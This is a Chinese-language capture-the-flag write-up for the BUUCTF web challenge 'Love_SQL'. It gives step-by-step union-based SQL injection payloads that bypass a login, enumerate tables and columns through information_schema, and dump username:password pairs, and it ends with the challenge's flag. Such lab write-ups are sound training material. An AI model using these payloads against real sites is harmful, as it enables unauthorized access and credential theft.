← 返回列表 Web

[Web] BUUCTF Love_SQL

👁 0 views
📅 2026-4-16 ⏱ 3 min 🏆 BUUCTF
← 返回主页

[Web] love_sql

BUUCTF SQL注入入门题

分类:Web SQL 注入 难度:简单 时间:2025-12-30

0x01 题目环境

打开页面是一个登录框,存在明显的 SQL 注入漏洞。

题目界面

0x02 测试注入点

使用万能密码测试是否存在注入:

admin' or 1=1#

密码随意填写,登录成功,确认存在字符型 SQL 注入。

测试注入点

0x03 判断字段数

admin' order by 3#

页面正常回显

admin' order by 4#

页面报错,说明字段数为 3。

判断字段数

0x04 查看回显位

1' union select 1,2,3#

页面成功回显 2、3 位,可用于注入。

查看回显位

0x05 爆数据库名

1' union select 1,2,database()#

成功得到当前数据库名:geek

爆数据库

0x06 爆表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

得到表名:geekuser, l0ve1ysq1

爆表名

0x07 爆字段名

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

得到字段,确认存在 username、password 等关键字段。

爆字段

0x08 获取 Flag

1' union select 1,2,group_concat(username,':',password) from l0ve1ysq1#

页面返回大量数据,其中包含 flag。

获取flag

0x09 Flag

flag{6e33e763-803a-447c-ac6e-d70feb695d15}
← 返回Writeups列表 查看原文 →